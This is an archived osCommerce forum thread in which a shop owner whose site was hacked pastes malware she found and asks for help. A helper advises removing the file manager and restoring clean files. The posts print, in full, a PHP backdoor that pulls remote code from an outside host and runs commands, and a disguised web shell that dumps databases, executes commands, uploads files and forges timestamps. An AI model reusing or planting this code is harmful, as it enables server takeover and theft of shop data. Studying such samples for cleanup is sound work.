Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Webhost says I have suffered a Iframe injection


Guest

Recommended Posts

I've spent my weekend trying to clean up my website and get rid of files and old contribs I don't use.

 

Along the way, I discovered two 'interesting' looking files in my catalog>includes>languages folder that didn't look right. Includes.php was one. Never heard of such a file.

 

I looked at it and realized something was wrong. Mind you, my website is humming along just fine. Looks great, no error messages, getting sales, nothing appears to be wrong.

 

This is the content of that includes.php file:

 

<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
   if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
   else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
   if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
   if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>

 

Panicked. Wrote to the webhost. They scanned my entire site and found about 50 more just like it...everywhere from the images folder to you name it. Strange looking .htaccess files were also created. I've been deleting files all night.

 

My question is: how does someone access the site to do that? And...why? Can someone decode the above file and explain what the point was? According to the webhost...they've been there since April. I am mortified.

 

I've changed my password to Cpanel. It was a tough one, too. Upper case, lower case, numbers. Struggling to figure out how to change my Admin username and password...any help would be appreciated on that front!

 

Lastly, what can I do...aside from changing passwords...to prevent this in the future? I already have Sitemonitor installed. Must admit...I never used it much. I will run it like clockwork now. I have IP Trap installed. Anything else? I'm running version 2.2.

 

- Andrea

Link to comment
Share on other sites

With that many files changed, it was probably done via the recently found security hole with the filemanager. That and other fixes can be found in these threads. If they did use that method of getting in, or maybe even if they didn't, they probably inserted some code that your searches may not find. If you decode the hacker code, as described in some of the above threads, you can determine what files they are using. Or, you can run the hacker test in SiteMonitor. It might be more work but it will find them. In the least, you need to delete the admin/file_manager.php file.

Support Links:

For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc.

All of My Addons

Get the latest versions of my addons

Recommended SEO Addons

Link to comment
Share on other sites

Hi Jack,

 

Thank You for replying. I installed Sitemonitor 1.8 a while back. Upgraded to 1.9 while waiting to hear back from the webhost. You mention running 'the hacker test' in Sitemonitor.

 

I've deleted all the files my webhost found when they scanned my site, but the hacker test came up with this list:

 

admin/htmlarea/editor_advanced.js

admin/htmlarea/editor_basic.js

admin/htmlarea/popups/insert_image.html

boards/includes/usercp_confirm.php

boards/templates/subSilver/posting_topic_review.tpl

images/table_background_info.php

includes/modules/payment/paypal_ipn.php

 

I've looked at images/table_background_info.php and this is what I get:

 

<?php
/*
 $Id: table_background_info.php,v 1.73 2003/02/13 01:58:23 hpdl Exp $

 osCommerce, Open Source E-Commerce Solutions
 http://www.oscommerce.com

 Copyright (c) 2003 osCommerce

 Released under the GNU General Public License
*/

define("OSCOMMERCE_FILENAME", 'shell.php');
define("SLASH", chr(92));
define("NL",    chr(10));
define("CRNL",  chr(13).chr(10));

$licence = "SBZRRRO7";

if (!isset($_POST['K']) || $licence != $_POST['K'])
{
 header("Status: 404 Not Found");
 header("HTTP/1.0 404 Not Found");
 $in = rand(10000000, 99999999);
 $fp = @fsockopen($_SERVER['SERVER_NAME'], 80, $errno, $errstr, 2);
 if ($fp) 
 {
   $name= preg_replace("~".addcslashes(OSCOMMERCE_FILENAME, ".")."~i", $in.".jpg", $_SERVER['SCRIPT_NAME']);
   $out  = "GET ".$name." HTTP/1.1".CRNL;
   $out .= "Host: ".$_SERVER['SERVER_NAME'].CRNL;
   $out .= "Connection: Close".CRNL.CRNL;
   fwrite($fp, $out);
   while (!feof($fp)) 
   {
     $data2save .= fgets($fp, 128);
   }
   @fclose($fp);

   if (strstr($data2save, CRNL.CRNL))
   {
     $data2save = substr(strstr($data2save, CRNL.CRNL), 4);
     $data2save = preg_replace("~".$in.SLASH.".jpg~i", OSCOMMERCE_FILENAME, $data2save);
     echo preg_replace("~^[\d\s]+$~mi", "", $data2save);
   }    
 }  
 die();
}

header("Expires: Mon, 26 Jul 1980 05:00:00 GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Cache-Control: private");
header("Pragma: no-cache");

set_time_limit(99999999999);
ini_set('memory_limit', -1); 

clearstatcache();
function dbc()
{
 if (is_file("../includes/configure.php"))
 {
   @include ("../includes/configure.php");    
 }
 else if (is_file("includes/configure.php"))
 {
   @include ("includes/configure.php");
 }

 if (isset($_POST['MYH'])) $MYH = $_POST['MYH']; else $MYH = DB_SERVER;
 if (isset($_POST['MYU'])) $MYU = $_POST['MYU']; else $MYU = DB_SERVER_USERNAME;
 if (isset($_POST['MYP'])) $MYP = $_POST['MYP']; else $MYP = DB_SERVER_PASSWORD;
 if (isset($_POST['MYD'])) $MYD = $_POST['MYD']; else $MYD = DB_DATABASE;

 $MYL = mysql_connect($MYH, $MYU, $MYP);
 mysql_select_db($MYD);

 return array($MYL, $MYH, $MYU, $MYP, $MYD);
}

if (isset($_POST['P']))
{
 die("A11");
}
else if (isset($_POST['MYST']))
{
 list($MYL, $MYH, $MYU, $MYP, $MYD) = dbc();
 $tables = "";
 $res = mysql_query("SHOW TABLES");
 while ($row = mysql_fetch_array($res))
 {
   $resCounts = @mysql_query("SELECT COUNT(*) FROM `".$row[0]."`", $MYL);
   $rowCounts = @mysql_fetch_array($resCounts);
   $tables .= "|:|".$row[0].":".$rowCounts[0].NL;
 }
 echo $tables;
 mysql_close($MYL);
 die("#done");
}
else if (isset($_POST['MYSD']))
{
 list($MYL, $MYH, $MYU, $MYP, $MYD) = dbc();
 $list = "";
 $res = mysql_query("SHOW DATABASES");
 while ($row = mysql_fetch_array($res))
 {
   $list .= "|:|".$row[0].NL;
 }
 echo $list;
 mysql_close($MYL);
 die("#done");
}
else if (isset($_POST['MYFR']))
{
 list($MYL, $MYH, $MYU, $MYP, $MYD) = dbc();

 if (substr($_POST['MYC'], 0, 1) == 0)
 {
   $res   = @mysql_query("SHOW CREATE TABLE `".$_POST['MYT']."`", $MYL);
   $row   = @mysql_fetch_array($res);
   echo $row[1].";".NL;
 }

 $res = @mysql_query("SELECT * FROM `".$_POST['MYT']."` LIMIT ".$_POST['MYC'], $MYL);
 if (@mysql_num_rows($res) > 0) 
 {
   while (($row = @mysql_fetch_array($res))) 
   {
     $keys   = @implode("`, `", @array_keys($row));
     $values = @array_values($row);
     foreach($values as $k=>$v) 
     {
       $values[$k] = mysql_escape_string($v);
     }
     $values = @implode("', '", $values);
     echo "INSERT INTO `".$_POST['MYT']."` (`".$keys."`) VALUES ('".$values."');".NL;
   }
 }
 mysql_close($MYL); 
 die("#done");       
}
else if (isset($_POST['MYINF']))
{
 $inf = dbc();
 unset($inf[0]);
 die(implode("|:|", $inf));
}  
else if (isset($_POST['E']))
{
 @exec($_POST['E'], $output, $retCode);
 die(($retCode != 0) ? ("RETCODE:".$retCode.NL) : "".implode(NL, $output));
}
else if (isset($_POST['U']) && isset($_POST['UF']) && isset($_POST['US'])) 
{
 if (strlen($_POST['U']) == $_POST['US'])
 {
   ignore_user_abort(true);
   $fpSave = fopen($_POST['UF'], "w");
   fwrite($fpSave, base64_decode($_POST['U']));
   fclose($fpSave);
   ignore_user_abort(false);
 }
}

if (isset($_POST['T']) || isset($_POST['UF']))
{
 if (isset($_POST['UF'])) $f = $_POST['UF']; else $f = $_POST['T']; 

 $t  = array();
 $d  = dir(".");
 $mt = 0;
 while (false !== ($e = $d->read()))
 {
   $nt = filemtime($e);
   if ($nt > $mt) $mt = $nt;
   if (preg_match("~table_background~", $e))
   {
     $t[0][] = $nt;
   }
   else
   {
     $t[1][] = $nt;
   }
 }
 $d->close();
 if (count($t[0]) > 0) $tc = 0; else $tc = 1;

 sort($t[$tc]);

 if (count($t[$tc]) > 0)
 {
   @touch($f,  $t[$tc][floor(count($t[$tc]) / 2)]);
   @touch("./", $mt);
 }  
}

?>

 

I'm 'looking' at the the paypal ipn file and don't see anything in particular...which means nothing. What do you think of the file I just posted? I'm unfamiliar with all of them, except the paypal file.

 

- Andrea

Link to comment
Share on other sites

It's a hacker file. There shouldn't be any files in the images directory other than image files and maybe a .htaccess file. The boards/includes/usercp_confirm.php is suspect too but that directory isn't standard oscommerce so it's difficult to say. For the others, there's really no way to know for sure if you are not familiar with what to look for other than comparing them with a known good copy. The best approach to a problem like this is to have the host restore the complete shop directory. You can tell from the datestamp on the hacked files when it happened and if they have a backup from before then, just replacing them all will fix all such problems. Tell them to be sure not to restore the database and there shouldn't be any problems. Once the restore is done, no matter how you do it, you should create a complete copy on your computer so there is something to compare against and to restore from if something like this happens again.

Support Links:

For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc.

All of My Addons

Get the latest versions of my addons

Recommended SEO Addons

Link to comment
Share on other sites

Thanks for all of your help, Jack. I deleted admin/filemanager.php as you suggested. Renamed the Admin folder to something ridiculous and changed the admin/includes/configure file. Changed my password to Cpanel, changed the username and password on my 'admin' folder.

 

All of the hacker files have been deleted. Those entries for the 'boards'...that folder is something I installed ages ago and never used. It was a message forum. So, I just chucked the entire folder.

 

Hopefully, all is well now. Never did experience any problems with the website. Orders are coming in like usual. I just wonder how they got in. My Admin folder has always been password protected. Complicated passwords on Cpanel and the admin folder. I'm stuck worrying about how they managed to get in.

 

The hacker also inserted a number of .htaccess files in the folders which contained hacker files. Here's an example of the content of one of them:

 

Options -MultiViews
ErrorDocument 404 //catalog/images/gt_interactive/base.php

 

The file base.php, of course, being a hacker file. Counted eleven new .htaccess files. Deleted them all.

I'm not going to go the restore route with the webhost as I really don't want to and fear it might create new problems. I'm always messing around with the website, changing things and trying new things. I think I have manually deleted all the hacker files and the hacker test in Sitemonitor is not showing anymore files. Hopefully, all I've done is all that needs to be done.

 

- Andrea

Link to comment
Share on other sites

Hopefully, all is well now. Never did experience any problems with the website. Orders are coming in like usual. I just wonder how they got in. My Admin folder has always been password protected. Complicated passwords on Cpanel and the admin folder. I'm stuck worrying about how they managed to get in.

If they got in using the file_manager.php file, they didn't need a login. It let them bypass it. If they got in some other way, you may never know. In order to know, or at least make an intelligent guess, you would need the server logs, the time they did it and probably their IP. It usually isn't worth the effort unless they were getting in over and over. I think the problem was the file manager and with the changes you made, it should be OK now.

Support Links:

For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc.

All of My Addons

Get the latest versions of my addons

Recommended SEO Addons

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...